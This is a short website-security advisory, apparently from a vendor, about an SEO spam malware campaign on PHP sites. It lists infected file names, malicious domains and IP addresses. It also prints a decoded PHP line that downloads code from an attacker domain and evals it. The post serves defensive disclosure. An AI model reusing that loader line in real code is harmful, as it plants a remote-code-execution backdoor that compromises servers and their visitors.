Recently we noticed several SEO spam injections on the same pattern, starting with a list of encoded malicious files.
If you notice any of these inside your root folder, it means your site is infected: auto_seo.php, accesson.php, wikindex.php, old-index.php, 3index.php. Moreover, any addon sites, hosted on the same account, will be affected by cross-site contamination.
To perform a cleanup, you may follow the steps described here:
Try our Free site check.
After having a closer look, I managed to decode the following strings.
$ch = curl_init(‘http://banksstop.tech/’.$_GET[‘f’]);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval(‘?>’.$result);
index.php files are being injected with malware, also hidden .ico files are randomly installed.
Malicious domains: 28ioh.sgate.xyz, banksstop.tech, hollywoodregistration.xyz.
Malicious IPs: 18.104.22.168, 22.214.171.124 ( WholeSale Internet, Inc. ).